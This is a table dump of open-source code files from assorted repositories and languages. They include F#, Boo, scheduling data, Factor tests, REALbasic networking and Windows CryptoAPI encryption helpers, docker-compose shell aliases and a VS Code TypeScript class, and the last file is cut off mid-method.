content
stringlengths 4
1.04M
| lang
stringclasses 358
values | score
int64 0
5
| repo_name
stringlengths 5
114
| repo_path
stringlengths 4
229
| repo_licenses
listlengths 1
8
|
---|---|---|---|---|---|
namespace OpenAPI
open UserApiHandlerParams
open System
open Giraffe
open Microsoft.AspNetCore.Http
module UserApiServiceInterface =
//#region Service interface
type IUserApiService =
abstract member CreateUser:HttpContext -> CreateUserArgs->CreateUserResult
abstract member CreateUsersWithArrayInput:HttpContext -> CreateUsersWithArrayInputArgs->CreateUsersWithArrayInputResult
abstract member CreateUsersWithListInput:HttpContext -> CreateUsersWithListInputArgs->CreateUsersWithListInputResult
abstract member DeleteUser:HttpContext -> DeleteUserArgs->DeleteUserResult
abstract member GetUserByName:HttpContext -> GetUserByNameArgs->GetUserByNameResult
abstract member LoginUser:HttpContext -> LoginUserArgs->LoginUserResult
abstract member LogoutUser:HttpContext ->LogoutUserResult
abstract member UpdateUser:HttpContext -> UpdateUserArgs->UpdateUserResult
//#endregion | F# | 4 | MalcolmScoffable/openapi-generator | samples/server/petstore/fsharp-giraffe/OpenAPI/src/api/UserApiServiceInterface.fs | [
"Apache-2.0"
] |
"""
01 02 03 04
"""
callable Transform[of TIn, TOut](x as TIn) as TOut
def Map[of TIn, TOut](source as (TIn), func as Transform[of TIn, TOut]):
arr = array(TOut, source.Length)
for i in range(source.Length):
arr[i] = func(source[i])
return arr
ints = (1,2,3,4)
strings = Map(ints, {i | i.ToString("00")})
print join(strings)
| Boo | 4 | popcatalin81/boo | tests/testcases/integration/closures/closure-inference-6.boo | [
"BSD-3-Clause"
] |
50 5 0 0
0 1 7 6 3 7 5 2 4 1 [0] [0] [0] [0] [0] [0] [0]
1 1 4 12 16 39 29 [5] [11] [-2] [1]
2 1 1 45 [13]
3 1 3 24 37 19 [12] [0] [26]
4 1 4 25 44 23 17 [-1] [11] [2] [-3]
5 1 4 34 29 12 19 [-8] [14] [10] [12]
6 1 2 38 44 [18] [5]
7 1 1 47 [6]
8 1 3 42 31 24 [6] [-2] [1]
9 1 6 25 48 50 43 36 49 [27] [30] [10] [10] [15] [29]
10 1 4 19 44 45 35 [-1] [-1] [5] [-149]
11 1 3 45 49 16 [9] [16] [4]
12 1 5 14 48 24 30 25 [-226] [-5] [12] [3] [-278]
13 1 5 24 40 45 31 19 [-1] [-1] [6] [0] [0]
14 1 2 13 50 [0] [2]
15 1 3 34 47 28 [0] [15] [-4]
16 1 2 49 18 [1] [21]
17 1 2 33 20 [-5] [-127]
18 1 2 28 49 [-254] [17]
19 1 3 48 24 30 [-5] [7] [-194]
20 1 2 11 17 [10] [23]
21 1 5 37 20 17 15 26 [-35] [-4] [18] [10] [-51]
22 1 2 4 14 [-159] [3]
23 1 2 22 48 [9] [7]
24 1 4 12 19 30 48 [-157] [-126] [-191] [4]
25 1 4 36 49 31 19 [-2] [3] [5] [15]
26 1 1 32 [10]
27 1 3 46 42 10 [0] [1] [1]
28 1 5 33 47 41 18 35 [-6] [0] [7] [26] [2]
29 1 3 27 33 49 [1] [0] [1]
30 1 3 48 19 23 [0] [0] [-230]
31 1 2 19 50 [3] [6]
32 1 3 31 3 21 [21] [-32] [9]
33 1 4 31 49 48 10 [0] [2] [3] [5]
34 1 5 49 30 32 3 25 [-8] [25] [-40] [-42] [21]
35 1 2 20 30 [3] [1]
36 1 4 49 50 30 44 [9] [20] [26] [29]
37 1 3 12 26 3 [1] [0] [-57]
38 1 1 39 [2]
39 1 6 19 31 20 48 8 50 [3] [1] [0] [0] [0] [3]
40 1 3 9 30 41 [12] [3] [7]
41 1 1 9 [5]
42 1 6 44 17 5 8 39 27 [2] [18] [-23] [-25] [-27] [-14]
43 1 3 9 12 36 [-180] [9] [6]
44 1 4 48 50 12 30 [0] [0] [0] [1]
45 1 1 51 [4]
46 1 3 51 27 1 [1] [-20] [-34]
47 1 1 51 [3]
48 1 1 51 [5]
49 1 1 51 [9]
50 1 2 33 51 [-212] [9]
51 1 0
0 1 0 0 0 0 0 0
1 1 5 2 7 1 2 10
2 1 6 10 1 10 2 8
3 1 10 0 6 0 0 1
4 1 6 0 0 0 1 4
5 1 10 1 1 1 1 9
6 1 7 3 6 5 1 8
7 1 9 1 2 0 2 0
8 1 3 10 9 8 0 0
9 1 10 6 0 0 0 0
10 1 2 9 1 6 9 4
11 1 6 3 8 0 0 3
12 1 6 0 1 0 2 0
13 1 2 4 6 0 1 0
14 1 1 7 6 2 0 6
15 1 7 2 2 9 4 2
16 1 8 1 6 0 0 0
17 1 8 5 8 7 8 9
18 1 9 0 8 6 8 6
19 1 6 0 3 0 8 10
20 1 8 0 8 9 1 10
21 1 6 9 7 8 1 8
22 1 6 0 5 0 4 3
23 1 3 10 4 6 0 2
24 1 2 6 0 0 4 9
25 1 5 4 0 10 5 0
26 1 4 0 0 1 8 0
27 1 2 7 6 0 2 0
28 1 10 5 1 4 8 10
29 1 1 9 0 8 8 10
30 1 1 2 0 7 0 0
31 1 9 0 2 0 8 8
32 1 7 8 6 2 2 2
33 1 2 0 0 0 9 9
34 1 10 0 10 8 8 5
35 1 1 5 0 2 9 5
36 1 10 10 6 4 2 5
37 1 1 0 2 10 7 7
38 1 6 5 8 10 10 0
39 1 1 6 6 0 7 8
40 1 10 8 8 0 3 3
41 1 2 0 7 9 6 6
42 1 7 5 9 1 1 9
43 1 4 2 3 4 10 0
44 1 1 5 6 0 1 6
45 1 4 1 9 3 10 9
46 1 1 3 5 5 9 5
47 1 3 9 3 8 4 6
48 1 5 2 6 0 10 4
49 1 9 8 4 4 10 1
50 1 9 0 1 10 1 0
51 1 0 0 0 0 0 0
24 24 25 19 26
| Eagle | 0 | klorel/or-tools | examples/data/rcpsp/single_mode_max_delay/ubo_50/psp53.sch | [
"Apache-2.0"
] |
# Test for : allowed
@prefix : <http://example.org/ron> .
[] : [] .
: : : .
| Turtle | 2 | joshrose/audacity | lib-src/lv2/sord/tests/test-13.ttl | [
"CC-BY-3.0"
] |
USING: arrays assocs english help.markup kernel math sequences
strings tools.test ;
FROM: english => a/an ;
{ "record" } [ "records" singularize ] unit-test
{ "record" } [ "record" singularize ] unit-test
{ "baby" } [ "babies" singularize ] unit-test
{ "baby" } [ "baby" singularize ] unit-test
{ "FOOT" } [ "FEET" singularize ] unit-test
{ "FOOT" } [ "FOOT" singularize ] unit-test
{ "cactus" } [ "cacti" singularize ] unit-test
{ "cactus" } [ "cactuses" singularize ] unit-test
{ "octopus" } [ "octopi" singularize ] unit-test
{ "octopus" } [ "octopuses" singularize ] unit-test
{ "friends" } [ "friend" pluralize ] unit-test
{ "friendlies" } [ "friendly" pluralize ] unit-test
{ "friendlies" } [ "friendlies" pluralize ] unit-test
{ "enemies" } [ "enemy" pluralize ] unit-test
{ "Sheep" } [ "Sheep" pluralize ] unit-test
{ "Moose" } [ "Moose" pluralize ] unit-test
{ "cacti" } [ "cactus" pluralize ] unit-test
{ "octopi" } [ "octopus" pluralize ] unit-test
{ t } [ "singular" singular? ] unit-test
{ f } [ "singulars" singular? ] unit-test
{ t } [ "singularity" singular? ] unit-test
{ f } [ "singularities" singular? ] unit-test
{ t } [ "thesis" singular? ] unit-test
{ f } [ "theses" singular? ] unit-test
{ t } [ "goose" singular? ] unit-test
{ t } [ "baby" singular? ] unit-test
{ t } [ "bird" singular? ] unit-test
{ f } [ "birds" singular? ] unit-test
{ t } [ "octopus" singular? ] unit-test
{ f } [ "octopi" singular? ] unit-test
{ t } [ "geese" plural? ] unit-test
{ f } [ "goose" plural? ] unit-test
{ t } [ "birds" plural? ] unit-test
{ f } [ "bird" plural? ] unit-test
{ t } [ "cats" plural? ] unit-test
{ f } [ "cat" plural? ] unit-test
{ t } [ "babies" plural? ] unit-test
{ f } [ "baby" plural? ] unit-test
{ t } [ "octopi" plural? ] unit-test
{ f } [ "octopus" plural? ] unit-test
! they are both singular and plural
{ t } [ "moose" plural? ] unit-test
{ t } [ "moose" singular? ] unit-test
{ t } [ "sheep" plural? ] unit-test
{ t } [ "sheep" singular? ] unit-test
{ "3 babies" } [ 3 "baby" count-of-things ] unit-test
{ "2.5 cats" } [ 2.5 "cat" count-of-things ] unit-test
{ "2.5 CATS" } [ 2.5 "CAT" count-of-things ] unit-test
{ "1 pipe" } [ 1 "pipe" count-of-things ] unit-test
{ "0 pipes" } [ 0 "pipe" count-of-things ] unit-test
{ "babies" } [ 3 "baby" ?pluralize ] unit-test
{ "BABIES" } [ 3 "BABY" ?pluralize ] unit-test
{ "cats" } [ 2.5 "cat" ?pluralize ] unit-test
{ "Cats" } [ 2.5 "Cat" ?pluralize ] unit-test
{ "pipe" } [ 1 "pipe" ?pluralize ] unit-test
{ "pipes" } [ 0 "pipe" ?pluralize ] unit-test
{ "a5s" } [ "address" a10n ] unit-test
{ "a10n" } [ "abbreviation" a10n ] unit-test
{ "l10n" } [ "localization" a10n ] unit-test
{ "i18n" } [ "internationalization" a10n ] unit-test
{ "f28n" } [ "floccinauccinihilipilification" a10n ] unit-test
{ "p43s" } [ "pneumonoultramicroscopicsilicovolcanoconiosis" a10n ] unit-test
{ "a10000c" } [ 10000 CHAR: b <string> "a" "c" surround a10n ] unit-test
{ "an" } [ "object" a/an ] unit-test
{ "an" } [ "elephant" a/an ] unit-test
{ "a" } [ "moose" a/an ] unit-test
{ "a" } [ "xylophone" a/an ] unit-test
{ "the" } [ "objects" ?plural-article ] unit-test
{ "an" } [ "object" ?plural-article ] unit-test
{ "the" } [ "elephants" ?plural-article ] unit-test
{ "an" } [ "elephant" ?plural-article ] unit-test
{ "a" } [ "moose" ?plural-article ] unit-test
{ "a" } [ "goose" ?plural-article ] unit-test
{ "the" } [ "geese" ?plural-article ] unit-test
{ "a" } [ "sheep" ?plural-article ] unit-test
{ { } } [ { } "or" comma-list ] unit-test
{ { "a" } } [ { "a" } "or" comma-list ] unit-test
{ { "a" " or " "b" } }
[ { "a" "b" } "or" comma-list ] unit-test
{ { "a" ", " "b" ", or " "c" } }
[ { "a" "b" "c" } "or" comma-list ] unit-test
{ { "a" ", " "b" ", " "x" ", and " "c" } }
[ { "a" "b" "x" "c" } "and" comma-list ] unit-test
{ {
{ "an " { $link object } } ", "
{ "a " { $link pair } } ", "
{ "a " { $link number } } ", "
{ "an " { $link array } } ", "
{ "a " { $link string } } ", "
{ "a " { $link sequence } } ", or "
{ "an " { $link assoc } }
} } [
{ object pair number array string sequence assoc }
or-markup-example
! an object, a pair, a number, an array, a string, a sequence, or an assoc
] unit-test
{ {
{ "an " { $link object } }
} } [ { object } or-markup-example ] unit-test
{ {
{ "an " { $link object } } " or "
{ "a " { $link pair } }
} } [ { object pair } or-markup-example ] unit-test
{ {
{ "an " { $link object } } ", "
{ "a " { $link pair } } ", or "
{ "a " { $snippet "thing" } }
} } [ { object pair "thing" } or-markup-example ] unit-test
| Factor | 3 | alex-ilin/factor | basis/english/english-tests.factor | [
"BSD-2-Clause"
] |
import Data.Vect
import Data.Fin
Vect_ext : (v : Vect n a) -> (w : Vect n a) -> ((i : Fin n) -> index i v = index i w)
-> v = w
Weird : (v: Vect n a) -> v = v
Weird v = Vect_ext ?hole0 ?hole1 ?hole2
f : Bool -> Nat
f True = 0
f True = ?help
f False = 1
| Idris | 3 | Qqwy/Idris2-Erlang | idris2/tests/idris2/reg003/Holes.idr | [
"BSD-3-Clause"
] |
#tag Module
Protected Module InternetConnectionWFS
#tag Method, Flags = &h1
Protected Function Configured() As Boolean
return Bitwise.BitAnd( Query, &h40 ) <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function LAN() As Boolean
return Bitwise.BitAnd( Query, &h2 ) <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function Modem() As Boolean
return Bitwise.BitAnd( Query, &h1 ) <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function ModemBusy() As Boolean
return Bitwise.BitAnd( Query, &h8 ) <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function NoConnection() As Boolean
if Query = 0 then return true
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function Offline() As Boolean
return Bitwise.BitAnd( Query, &h20 ) <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function Proxy() As Boolean
return Bitwise.BitAnd( Query, &h4 ) <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h21
Private Function Query() As Integer
Soft Declare Function InternetGetConnectedState Lib "WinInet" ( ByRef state as Integer, reserved as Integer ) as Boolean
if System.IsFunctionAvailable( "InternetGetConnectedState", "WinInet" ) then
Dim n as Integer
if not InternetGetConnectedState( n, 0 ) then return 0 else return n
end if
return 0
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function RASInstalled() As Boolean
return Bitwise.BitAnd( Query, &h10 ) <> 0
End Function
#tag EndMethod
#tag ViewBehavior
#tag ViewProperty
Name="Index"
Visible=true
Group="ID"
InitialValue="-2147483648"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Left"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Name"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Super"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Top"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag EndViewBehavior
End Module
#tag EndModule
| REALbasic | 4 | bskrtich/WFS | Windows Functionality Suite/Networking/Modules/InternetConnectionWFS.rbbas | [
"MIT"
] |
;;; 26 lines 14 code 4 comments 8 blanks
(import (srfi srfi-1)) ; for reduce
;; Constant
(define %pi 3.14159265358979323846)
#| This is a block comment |#
(define (degrees->radians deg)
(* deg (/ %pi 180)))
;; Function
(define (sq x) (* x x))
(define (sum xs)
"Sum list of elements."
(reduce + 0 xs)) ; comment
(define (sum-upto n)
(/ (* n (1+ n)) 2))
(define (test-sums n)
(= (sum-upto n)
(sum (iota (1+ n)))))
(test-sums 100)
| Scheme | 5 | alexmaco/tokei | tests/data/scheme.scm | [
"Apache-2.0",
"MIT"
] |
--TEST--
Cloning unconstructed IntlDateFormatter
--EXTENSIONS--
intl
--FILE--
<?php
class A extends IntlDateFormatter {
function __construct() {}
}
$a = new A;
try {
$b = clone $a;
} catch (Exception $e) {
var_dump($e->getMessage());
}
?>
--EXPECTF--
string(%s) "Cannot clone unconstructed IntlDateFormatter"
| PHP | 3 | NathanFreeman/php-src | ext/intl/tests/dateformat_clone_bad_obj.phpt | [
"PHP-3.01"
] |
/*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { ContextKeyExpr, ContextKeyExpression, IContextKeyService } from 'vs/platform/contextkey/common/contextkey';
import { IBreakpointContribution } from 'vs/workbench/contrib/debug/common/debug';
export class Breakpoints {
private breakpointsWhen: ContextKeyExpression | undefined;
constructor(
private readonly breakpointContribution: IBreakpointContribution,
@IContextKeyService private readonly contextKeyService: IContextKeyService,
) {
this.breakpointsWhen = typeof breakpointContribution.when === 'string' ? ContextKeyExpr.deserialize(breakpointContribution.when) : undefined;
}
get language(): string {
return this.breakpointContribution.language;
}
get enabled(): boolean {
return !this.breakpointsWhen || this.contextKeyService.contextMatchesRules(this.breakpointsWhen);
}
}
| TypeScript | 4 | KevinAo22/vscode | src/vs/workbench/contrib/debug/common/breakpoints.ts | [
"MIT"
] |
# support Compose v2 as docker CLI plugin
DOCKER_CONTEXT=default command docker compose &>/dev/null \
&& dccmd='docker compose' \
|| dccmd='docker-compose'
alias dco="$dccmd"
alias dcb="$dccmd build"
alias dce="$dccmd exec"
alias dcps="$dccmd ps"
alias dcrestart="$dccmd restart"
alias dcrm="$dccmd rm"
alias dcr="$dccmd run"
alias dcstop="$dccmd stop"
alias dcup="$dccmd up"
alias dcupb="$dccmd up --build"
alias dcupd="$dccmd up -d"
alias dcdn="$dccmd down"
alias dcl="$dccmd logs"
alias dclf="$dccmd logs -f"
alias dcpull="$dccmd pull"
alias dcstart="$dccmd start"
alias dck="$dccmd kill"
unset dccmd
| Shell | 3 | jxlwqq/ohmyzsh | plugins/docker-compose/docker-compose.plugin.zsh | [
"MIT"
] |
20 5 2 0
0 1 21 14 8 17 5 18 15 21 10 6 9 20 13 2 16 1 4 3 19 7 12 11 [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0]
1 5 4 10 21 16 20 [3 0 2 0 0 0 0 1 1 0 -1 15 -1 14 0 9 3 -2 -2 1 23 21 14 0 27] [1 2 6 4 9] [2 0 0 0 1 -1 1 2 4 2 7 18 -3 13 -1 0 4 11 9 11 17 13 0 -1 12] [0 0 1 1 1 3 6 5 1 3 1 6 3 -2 1 -2 5 3 6 9 7 23 -7 23 18]
2 5 4 21 17 20 10 [5 6 3 2 6] [9 -3 6 4 14 18 -1 0 -5 -1 3 4 5 0 4 5 0 4 6 4 -1 -3 7 10 10] [0 5 -4 8 10 -2 -1 1 -1 3 -2 1 6 6 8 6 2 6 1 -1 16 13 1 14 8] [3 15 -4 12 2 8 14 18 -2 3 -1 0 0 8 3 2 3 0 5 1 3 1 9 0 10]
3 5 4 10 20 16 21 [5 7 0 10 4 2 1 3 1 3 0 18 -5 5 30 1 2 0 0 2 3 4 0 5 5] [-4 -3 15 5 9 1 0 1 0 3 13 9 8 0 0 3 2 3 0 0 5 6 -1 6 0] [14 8 0 -1 14 1 0 0 0 2 19 -2 22 19 10 0 0 3 0 3 -1 6 4 0 6] [5 1 10 1 2]
4 5 4 15 20 10 21 [16 23 14 10 3 5 8 -1 3 -1 2 0 0 3 0 21 25 27 18 9 15 1 -1 2 12] [23 -7 15 -2 26 7 -2 0 5 9 3 1 1 2 0 3 9 14 26 0 4 11 13 -3 6] [0 -7 7 2 10 0 1 4 1 0 1 0 2 0 2 29 11 -2 17 -4 -2 11 3 -1 -2] [9 3 1 10 5]
5 5 4 8 20 12 21 [0 3 3 0 0 4 10 13 28 -6 2 0 3 3 2 3 1 5 1 3 0 0 1 2 0] [2 0 0 1 1 11 -8 4 27 -7 2 3 1 1 3 0 1 3 -1 1 1 3 2 0 3] [0 3 0 2 2 16 6 29 -7 9 0 0 2 1 1 -1 0 1 0 3 2 0 2 0 0] [1 10 1 2 1]
6 5 3 21 12 11 [1 10 3 7 10] [2 1 0 2 0 23 17 19 15 30 7 5 0 2 0 -2 5 4 -3 13 10 19 -3 20 11] [-59 -60 -189 -209 -105 -178 -160 -101 -172 -187 -205 -208 -212 -222 -150 -155 -133 -214 -116 -93 -86 -192 -83 -158 -129]
7 5 2 21 11 [9 2 2 7 8] [0 8 27 -2 -3 6 -1 2 0 6 6 1 0 0 2 -1 18 8 18 3 1 12 1 13 11]
8 5 2 21 18 [8 2 3 3 4] [9 2 -3 8 1 6 0 1 6 4 -2 0 2 9 3 2 5 6 -2 5 9 4 5 6 12]
9 5 2 19 21 [23 16 14 0 3 10 -4 9 21 13 23 11 -6 20 2 9 13 -1 7 11 17 -2 -5 8 5] [9 8 10 5 6]
10 5 3 21 8 13 [1 9 8 6 10] [1 0 2 0 1 -3 8 8 -3 -7 -6 10 2 16 0 6 -4 -3 14 9 30 9 27 24 19] [2 3 0 0 3 20 27 -4 16 11 0 -1 5 -2 7 -2 14 13 1 -3 3 9 25 4 -3]
11 5 2 21 14 [7 2 10 5 6] [4 15 11 13 14 5 4 6 -1 5 -5 18 22 1 27 -3 0 14 0 15 18 13 2 0 1]
12 5 3 1 19 21 [-80 -117 -209 -71 -185 -154 -226 -213 -75 -131 -49 -80 -158 -130 -82 -86 -107 -192 -92 -219 -123 -154 -116 -183 -52] [4 4 21 23 5 12 6 13 3 3 0 2 4 0 6 9 2 8 7 -2 13 17 -8 12 -7] [8 5 2 5 10]
13 5 3 9 7 21 [0 8 8 -1 6 13 8 -4 7 5 -5 5 12 -6 20 17 -2 7 1 9 3 2 2 2 2] [6 11 7 12 9 1 9 4 12 15 7 0 -6 2 4 -2 9 -3 6 16 0 0 2 3 3] [4 5 8 6 1]
14 5 2 6 21 [9 21 8 -5 7 11 6 -9 -4 -7 1 2 3 2 6 10 0 13 7 7 12 17 -4 8 6] [8 10 2 9 6]
15 5 3 21 11 8 [9 9 9 6 3] [26 -1 0 23 16 -5 -4 27 19 0 -7 7 20 16 5 2 15 13 4 4 8 4 0 8 2] [15 15 6 13 19 -7 16 -6 17 -4 -3 3 -4 10 20 17 13 18 13 6 7 8 0 -2 2]
16 5 3 13 21 17 [8 14 -8 -2 -4 7 23 -4 3 -5 3 8 2 0 2 6 24 -6 12 21 -7 12 17 13 22] [9 9 3 8 9] [-3 25 20 15 24 5 -1 5 7 0 0 0 2 2 7 0 16 12 0 -4 19 -7 7 9 -4]
17 5 3 15 21 7 [12 12 21 -8 29 17 21 -6 -2 18 11 26 3 8 6 14 9 12 -2 -3 1 5 5 0 8] [10 7 9 5 4] [22 4 25 8 20 11 19 21 -2 4 15 1 -4 2 24 1 6 14 0 12 0 -3 9 7 12]
18 5 2 9 21 [0 2 0 4 0 0 2 0 -1 5 1 0 1 3 1 19 -7 4 6 -5 -1 9 8 8 8] [2 2 1 9 3]
19 5 1 21 [6 1 4 1 6]
20 5 2 1 21 [-246 -102 -171 -240 -154 -77 -156 -78 -138 -222 -166 -149 -105 -147 -88 -220 -125 -121 -236 -205 -228 -194 -116 -200 -136] [3 2 1 2 10]
21 1 0
0 1 0 0 0 0 0 0 0 0
1 1 1 4 3 5 1 5 4 4
2 2 4 3 5 1 5 4 4
3 6 4 3 5 1 5 4 4
4 4 4 3 5 1 5 4 4
5 9 4 3 5 1 5 4 4
2 1 5 3 5 1 5 5 5 2
2 6 3 5 1 5 5 5 2
3 3 3 5 1 5 5 5 2
4 2 3 5 1 5 5 5 2
5 6 3 5 1 5 5 5 2
3 1 5 2 5 4 1 1 4 3
2 1 2 5 4 1 1 4 3
3 10 2 5 4 1 1 4 3
4 1 2 5 4 1 1 4 3
5 2 2 5 4 1 1 4 3
4 1 9 2 5 1 3 1 3 2
2 3 2 5 1 3 1 3 2
3 1 2 5 1 3 1 3 2
4 10 2 5 1 3 1 3 2
5 5 2 5 1 3 1 3 2
5 1 1 3 1 5 3 3 2 5
2 10 3 1 5 3 3 2 5
3 1 3 1 5 3 3 2 5
4 2 3 1 5 3 3 2 5
5 1 3 1 5 3 3 2 5
6 1 1 1 4 2 1 3 3 5
2 10 1 4 2 1 3 3 5
3 3 1 4 2 1 3 3 5
4 7 1 4 2 1 3 3 5
5 10 1 4 2 1 3 3 5
7 1 9 2 2 3 1 4 3 4
2 2 2 2 3 1 4 3 4
3 2 2 2 3 1 4 3 4
4 7 2 2 3 1 4 3 4
5 8 2 2 3 1 4 3 4
8 1 8 1 4 3 5 1 3 3
2 2 1 4 3 5 1 3 3
3 3 1 4 3 5 1 3 3
4 3 1 4 3 5 1 3 3
5 4 1 4 3 5 1 3 3
9 1 9 5 4 5 3 5 1 5
2 8 5 4 5 3 5 1 5
3 10 5 4 5 3 5 1 5
4 5 5 4 5 3 5 1 5
5 6 5 4 5 3 5 1 5
10 1 1 3 2 3 1 1 1 4
2 9 3 2 3 1 1 1 4
3 8 3 2 3 1 1 1 4
4 6 3 2 3 1 1 1 4
5 10 3 2 3 1 1 1 4
11 1 7 5 3 2 2 5 4 5
2 2 5 3 2 2 5 4 5
3 10 5 3 2 2 5 4 5
4 5 5 3 2 2 5 4 5
5 6 5 3 2 2 5 4 5
12 1 8 5 1 3 4 3 3 4
2 5 5 1 3 4 3 3 4
3 2 5 1 3 4 3 3 4
4 5 5 1 3 4 3 3 4
5 10 5 1 3 4 3 3 4
13 1 4 4 3 4 2 1 1 2
2 5 4 3 4 2 1 1 2
3 8 4 3 4 2 1 1 2
4 6 4 3 4 2 1 1 2
5 1 4 3 4 2 1 1 2
14 1 8 2 3 3 1 3 4 2
2 10 2 3 3 1 3 4 2
3 2 2 3 3 1 3 4 2
4 9 2 3 3 1 3 4 2
5 6 2 3 3 1 3 4 2
15 1 9 1 3 2 5 2 3 4
2 9 1 3 2 5 2 3 4
3 9 1 3 2 5 2 3 4
4 6 1 3 2 5 2 3 4
5 3 1 3 2 5 2 3 4
16 1 9 5 1 1 4 4 3 3
2 9 5 1 1 4 4 3 3
3 3 5 1 1 4 4 3 3
4 8 5 1 1 4 4 3 3
5 9 5 1 1 4 4 3 3
17 1 10 2 5 5 4 2 4 1
2 7 2 5 5 4 2 4 1
3 9 2 5 5 4 2 4 1
4 5 2 5 5 4 2 4 1
5 4 2 5 5 4 2 4 1
18 1 2 1 4 1 4 4 5 1
2 2 1 4 1 4 4 5 1
3 1 1 4 1 4 4 5 1
4 9 1 4 1 4 4 5 1
5 3 1 4 1 4 4 5 1
19 1 6 3 2 5 3 5 1 2
2 1 3 2 5 3 5 1 2
3 4 3 2 5 3 5 1 2
4 1 3 2 5 3 5 1 2
5 6 3 2 5 3 5 1 2
20 1 3 5 3 1 3 1 2 2
2 2 5 3 1 3 1 2 2
3 1 5 3 1 3 1 2 2
4 2 5 3 1 3 1 2 2
5 10 5 3 1 3 1 2 2
21 1 0 0 0 0 0 0 0 0
32 34 32 31 32 59 122
| Eagle | 1 | klorel/or-tools | examples/data/rcpsp/multi_mode_max_delay/mm_j20/psp268.sch | [
"Apache-2.0"
] |
#tag Module
Protected Module CryptographyWFS
#tag Method, Flags = &h21
Private Sub AppendDataChunkToBuffer(dataChunk as MemoryBlock, size as Integer)
if dataChunk = nil then return
dim replacementBuffer as MemoryBlock
dim startLoc as Integer
if mBuffer = nil then
// First, we may need to allocate the buffer
replacementBuffer = new MemoryBlock( size )
startLoc = 0
else
// Otherwise we need to make a new buffer
// that is large enough to hold all the data
replacementBuffer = new MemoryBlock( size + mBuffer.Size )
// And copy over the old data
replacementBuffer.StringValue( 0, mBuffer.Size ) = mBuffer
startLoc = mBuffer.Size
end
// And append on our new data
replacementBuffer.StringValue( startLoc, size ) = dataChunk.StringValue( 0, size )
// And set our new buffer
mBuffer = replacementBuffer
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub BeginDecryption(password as String)
// This function does the same stuff as
// BeginEncryption does, so we'll just call
// thru to that
BeginEncryption( password )
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub BeginEncryption(password as String)
#if TargetWin32
// We want to start encrypting data. In order to
// do this, we need to hash out the password
// Check to make sure we have a provider
if mProvider = 0 then
MsgBox "No provider"
return
end
// Check to see if we already have a hash password,
// and if we do, it's an error
if mPasswordHashHandle <> 0 then
MsgBox "Already have a hash password!"
return
end
// Hash out the new password
Call HashData( mProvider, password, mPasswordHashHandle )
// Now that we have the password hashed, let's
// make our encryption key
Declare Function CryptDeriveKey Lib "AdvApi32" ( provider as Integer, _
cipher as Integer, hash as Integer, export as Integer, _
ByRef key as Integer ) as Integer
dim key, ret as Integer
Const CRYPT_EXPORTABLE = &h1
ret = CryptDeriveKey( mProvider, mCryptoAlgorithm, mPasswordHashHandle, _
CRYPT_EXPORTABLE, mEncryptionKey )
Declare Function GetLastError Lib "Kernel32" () as Integer
if ret = 0 then
MsgBox "Couldn't derive a key: 0x" + Hex( GetLastError )
return
end
// Reset our encryption buffer
mBuffer = nil
dim blockLen as Integer
// Now we want to get the hash value back
Declare Function CryptGetKeyParam Lib "AdvApi32" ( _
key as Integer, type as Integer, value as Ptr, _
ByRef length as Integer, flags as Integer ) as Integer
dim size as Integer = 4
dim toss as new MemoryBlock( 4 )
Const KP_BLOCKLEN = 8
ret = CryptGetKeyParam( mEncryptionKey, KP_BLOCKLEN, toss, _
size, 0 )
blockLen = toss.Long( 0 )
mBlockLength = blockLen
#else
#pragma unused password
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub DecryptChunk(data as String)
#if TargetWin32
// Make sure that we have an decryption key
if mEncryptionKey = 0 then
MsgBox "No decryption key"
return
end
// Now let's decrypt the data
Declare Function CryptDecrypt Lib "AdvApi32" ( key as Integer, _
hash as Integer, final as Boolean, flags as Integer, _
data as Integer, ByRef dataLength as Integer ) as Integer
dim done as Boolean
done = (data = "")
dim ret as Integer
// Stuff it into a memory block
dim dataLength as Integer = LenB( data )
// Now we make a buffer large enough to hold the
// encrypted data
dim encryptedData as Integer
dim mb as MemoryBlock
if dataLength > 0 then
mb = new MemoryBlock( dataLength )
mb = data
encryptedData = MakeMemoryBlockAsInteger( mb )
end
ret = CryptDecrypt( mEncryptionKey, 0, done, 0, encryptedData, dataLength )
if ret = 0 and not done then
MsgBox "Could not decrypt data"
return
end
// And add the new chunk of encrypted data to
// our ongoing data
AppendDataChunkToBuffer( MemoryBlockFromInteger( encryptedData ), dataLength )
#else
#pragma unused data
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h21
Private Sub DestroyHashAndKey()
#if TargetWin32
Dim ret as Integer
// Free our hash handle
Declare Function CryptDestroyHash Lib "AdvApi32" ( _
hashHandle as Integer ) as Integer
ret = CryptDestroyHash( mPasswordHashHandle )
if ret = 0 then
MsgBox "Couldn't destroy the password hash"
return
end
// And free our key as well
Declare Function CryptDestroyKey Lib "AdvApi32" ( _
key as Integer ) as Integer
ret = CryptDestroyKey( mEncryptionKey )
if ret = 0 then
MsgBox "Couldn't destroy the key"
return
end
